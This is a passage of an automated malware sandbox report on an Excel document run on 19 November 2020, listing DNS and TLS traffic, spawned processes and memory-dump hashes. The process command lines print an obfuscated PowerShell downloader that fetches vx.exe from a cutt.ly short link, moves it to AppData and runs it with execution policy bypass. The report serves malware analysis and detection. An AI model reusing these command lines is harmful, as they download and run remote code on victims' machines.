                                                  Nov 19, 2020 10:13:22.567907095 CET8.8.8.8192.168.2.220x51f2No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                  Nov 19, 2020 10:13:22.567907095 CET8.8.8.8192.168.2.220x51f2No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                  Nov 19, 2020 10:13:22.567907095 CET8.8.8.8192.168.2.220x51f2No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                  Nov 19, 2020 10:13:24.451885939 CET8.8.8.8192.168.2.220x541fNo error (0)shopphongtinh.com202.92.6.10A (IP address)IN (0x0001)

                                                  HTTPS Packets

                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                  Nov 19, 2020 10:13:22.638271093 CET104.22.1.232443192.168.2.2249167CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                  CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:10:12:45
                                                  Start date:19/11/2020
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                  Imagebase:0x13f200000
                                                  File size:27641504 bytes
                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:12:48
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                  Imagebase:0x4abb0000
                                                  File size:345088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:12:48
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                  Imagebase:0x4abb0000
                                                  File size:345088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:12:48
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                  Imagebase:0x4abb0000
                                                  File size:345088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:12:49
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                  Imagebase:0x13ffd0000
                                                  File size:473600 bytes
                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:10:12:49
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                  Imagebase:0x13ffd0000
                                                  File size:473600 bytes
                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:10:12:49
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                  Imagebase:0x13ffd0000
                                                  File size:473600 bytes
                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2128634758.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ceba9b6edcc438566a05a68a3a02790a318ffd95159558b52af58a1fda2a05b5
                                                    • Instruction ID: f532b43262ff8362122cd3b09f73af07057f62f358d9147ab4eb8429af243f28
                                                    • Opcode Fuzzy Hash: ceba9b6edcc438566a05a68a3a02790a318ffd95159558b52af58a1fda2a05b5
                                                    • Instruction Fuzzy Hash: A541802160EBC64FE75357785C666A17FF0EF17210B0A00E7D488CB1A3D9589D49C7A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2128634758.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e81eb42b443b10cbefe86567e8b723da30cfb748908022496fadc7013d006679
                                                    • Instruction ID: d6f7856ca93e2f5d3a9cbdbb2ef4523e3416e91518583626c850cffdcba0bf65
                                                    • Opcode Fuzzy Hash: e81eb42b443b10cbefe86567e8b723da30cfb748908022496fadc7013d006679
                                                    • Instruction Fuzzy Hash: A611996144E3D14FE7039778AC612907FB0AF57214F4A01C7E884CF1A3E2591AA9C763
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2161573534.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c70ccfce2ccb623d20ac8216a17e55640227a7170db1f2de395e25dc7895a76
                                                    • Instruction ID: 932a6ee767d33043eb11abe1fd3eb6e999518e54c4a714d37b974705f09d03b0
                                                    • Opcode Fuzzy Hash: 5c70ccfce2ccb623d20ac8216a17e55640227a7170db1f2de395e25dc7895a76
                                                    • Instruction Fuzzy Hash: A001EE6144E7D14FD3434B386C252A17FB0AF93210F4A42DBD4C4CE0E3D2580A59C363
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2161573534.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 801e7a08b555dbd0b1ba81769a7710ddbbe5c496eece90dafe89e45686d75ded
                                                    • Instruction ID: e4062db28773ad654a5143d98dcf06bf502d16a2909d64be704312a65a80ae98
                                                    • Opcode Fuzzy Hash: 801e7a08b555dbd0b1ba81769a7710ddbbe5c496eece90dafe89e45686d75ded
                                                    • Instruction Fuzzy Hash: 17011E5294EBD54FD30393341D6A6A13FB26E17124B5F05DBD084CF4A3E28D0A8AC3A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2172644873.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ad9bbfcc65e159029eeeb3f9d950042e9be54db5e598106e8b478fd1fcd2503
                                                    • Instruction ID: d7b4d435215ae5477e753dd0ab3c83bda4210206781918c70a8c0af677e3feda
                                                    • Opcode Fuzzy Hash: 4ad9bbfcc65e159029eeeb3f9d950042e9be54db5e598106e8b478fd1fcd2503
                                                    • Instruction Fuzzy Hash: 9101EE6184E7C14FE34347785C292A03FB0AF57144B0E02DBD4C8CE0B3E55C0AAAC362
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions